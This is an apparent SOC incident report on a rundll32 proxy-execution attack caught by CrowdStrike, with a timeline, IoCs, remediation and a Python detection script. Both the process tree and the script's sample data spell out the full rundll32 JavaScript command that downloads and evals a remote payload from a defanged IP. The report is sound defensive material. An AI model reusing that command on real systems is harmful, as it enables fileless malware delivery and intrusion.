T1218 – System Binary Proxy Execution (CrowdStrike Detection)

CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-1218-7842
Alert Time: 2024-02-20 11:30:22 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious Rundll32 Execution – No Command Line Arguments”
MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32

Alert Details:

Detection: Rundll32.exe executed with suspicious parameters

Host: MKT-WS-078 (Marketing Department)
User: sjones (Sarah Jones, Marketing Manager)
Time: 11:25 EST

Process Tree:

explorer.exe (PID: 2341)
    cmd.exe (PID: 4789)
        rundll32.exe (PID: 4792)
            Command Line: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)

Detection Logic:

Rundll32.exe executing JavaScript code (unusual)
JavaScript downloads and executes payload from remote URL
No legitimate rundll32 use case for this behavior
Pattern matches known “Squiblydoo” attack technique

Additional Context:

User sjones reported receiving email with “important document” link
Clicked link at 11:20 EST
No legitimate reason for rundll32 to run JavaScript
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed suspicious rundll32 JavaScript execution |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | Payload URL hosts Cobalt Strike beacon |
| 3. Process Investigation | Terminate rundll32 process | CrowdStrike | Process killed |
| 4. Network Block | Block malicious URL | Zscaler, Palo Alto | URL blocked |
| 5. User Interview | Contact user | Teams, Phone | User clicked link in email; no further action |
| 6. Host Scan | Full scan for malware | CrowdStrike | No additional malware found |

Jira Incident Report
Ticket: SOC-2024-103
Summary: T1218 – Rundll32 Used as Proxy to Download Malicious Payload
Status: RESOLVED
Resolution: MALICIOUS – Execution Blocked
Priority: P2 – MEDIUM
Labels: T1218, system-binary-proxy, rundll32, squiblydoo, crowdstrike
Components: Endpoint-Security, Defense-Evasion

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Rundll32 Execution – No Command Line Arguments”.
Host: MKT-WS-078 (Marketing Department, user sjones).
Process: rundll32.exe executing JavaScript.
Time: 2024-02-20 11:30 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.

2. Technical Analysis:

Attack Chain:

11:20 – User receives email with link
11:21 – User clicks link
11:22 – Website redirects to exploit kit
11:23 – PowerShell command executed via browser
11:24 – PowerShell launches cmd.exe
11:25 – cmd.exe launches rundll32 with JavaScript
11:25 – JavaScript attempts to download payload from 185.143.221[.]89
11:25 – CrowdStrike detects and alerts

Rundll32 Technique:

Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";…
Purpose: Use trusted Windows binary to execute malicious JavaScript
Effect: Downloads and executes payload in memory (fileless)
Evasion: Bypasses application whitelisting (rundll32 is trusted)

Payload Analysis:

URL: http://185.143.221[.]89/payload
Content: Encrypted Cobalt Strike beacon
Status: Blocked by firewall (URL not reached)

User Activity:

User clicked link expecting “marketing report”
No immediate signs of compromise

3. Investigation Findings:

Timeline:

11:20 – Phishing link clicked
11:21-11:25 – Attack chain
11:25 – CrowdStrike alert
11:27 – SOC investigates
11:28 – Rundll32 process terminated
11:29 – URL blocked

Indicators of Compromise (IoCs):

Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89

Process:
– rundll32.exe with JavaScript command line

4. Containment Actions:

Immediate Actions:

Terminated rundll32 process.
Blocked malicious URL at firewall and proxy.
Isolated host temporarily.

Host Remediation:

Full scan (no malware persisted).
Verified no file written to disk.

User Remediation:

Password reset.
Phishing training assigned.

5. Root Cause Analysis:

Primary Cause: User clicked phishing link.
Contributing Factors:
Rundll32 allowed to execute JavaScript (no restrictions).
No ASR rule blocking script execution via Office/trusted binaries.

6. Business Impact:

Operational Impact: Marketing workstation offline for 1 hour.
Data Exposure: None (payload blocked).

7. Remediation & Prevention:

Completed Actions:

Malicious process terminated.
URL blocked.
User educated.

Technical Controls Enhanced:

Enabled ASR rule “Block JavaScript or VBScript from launching downloaded executable content”.
Created alert for rundll32 with suspicious command lines.
Enhanced URL filtering.
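The detection logic listed in the alert and the rundll32 command-line alert created above can be expressed as a small scoring rule over process-creation telemetry. The Python below is an added example written for this write-up; it is not CrowdStrike's detection nor the SOC's own rule. The event dictionaries are constructed samples whose field names (host, parent_image, image, command_line) are an assumed generic EDR/Sysmon export, and the score thresholds are arbitrary. It flags the two conditions the alert name and the process tree describe (rundll32 with no arguments at all, and rundll32 handed a javascript: protocol string that proxies through mshtml and reaches out to a remote URL) while leaving a normal Control Panel invocation alone.

```python
"""Heuristic detection for rundll32 script-proxy execution (T1218.011)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (not real telemetry). The
# field names are an assumed generic EDR export, not CrowdStrike's schema.
SAMPLE_EVENTS = [
    {"host": "MKT-WS-078", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
                     'document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                     'h.Open("GET","http://185.143.221[.]89/payload",false);'
                     'h.Send();eval(h.responseText)'},
    {"host": "FIN-WS-012", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl"},
    {"host": "HR-WS-003", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": "rundll32.exe"},
    {"host": "DEV-WS-044", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe report.txt"},
]

# Indicators drawn from the command line in this incident.
SCRIPT_PROTOCOL = re.compile(r"\b(javascript|vbscript):", re.I)
MSHTML_PROXY = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
# Parents that rarely have a legitimate reason to spawn rundll32.
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe", "winword.exe", "excel.exe",
                      "outlook.exe"}


@dataclass
class Finding:
    host: str
    severity: str
    reasons: List[str]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> Optional[Finding]:
    """Score one process-creation event; None means nothing suspicious."""
    if basename(event["image"]) != "rundll32.exe":
        return None
    parts = event["command_line"].split(None, 1)
    args = parts[1] if len(parts) > 1 else ""
    reasons, score = [], 0
    if not args.strip():
        # Matches the alert name: rundll32 with no command line arguments.
        reasons.append("rundll32 launched with no arguments")
        score += 40
    if SCRIPT_PROTOCOL.search(args):
        reasons.append("script protocol handler in command line")
        score += 50
    if MSHTML_PROXY.search(args):
        reasons.append("mshtml RunHTMLApplication proxy")
        score += 30
    if REMOTE_URL.search(args):
        reasons.append("remote URL in command line")
        score += 20
    parent = basename(event["parent_image"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
        score += 10
    if not reasons:
        return None
    severity = "HIGH" if score >= 70 else "MEDIUM" if score >= 40 else "LOW"
    return Finding(event["host"], severity, reasons)


def scan(events: List[dict]) -> List[Finding]:
    """Run analyze() over a batch of events and keep only the hits."""
    return [f for f in map(analyze, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.host, finding.severity, "; ".join(finding.reasons))
```

The Control Panel launch (shell32.dll,Control_RunDLL) scores nothing because it carries a DLL and export name rather than a script protocol handler, which is the distinction the detection logic above relies on. The bare rundll32.exe event is scored MEDIUM on its own so that the no-argument case named in the rule title is still surfaced for review.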

8. Conclusion:

An attacker used rundll32 to proxy the download of a malicious payload via JavaScript, a fileless technique. CrowdStrike detected the anomalous rundll32 execution and terminated the process before the payload could execute.

Closure Rationale: Process terminated; URL blocked; user educated.

Analyst: [Walter White], SOC Analyst Date: 2024-02-20 12:30 EST
